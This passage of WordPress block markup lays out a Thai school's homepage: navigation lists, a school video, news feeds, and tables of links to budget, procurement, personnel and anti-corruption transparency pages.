class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe 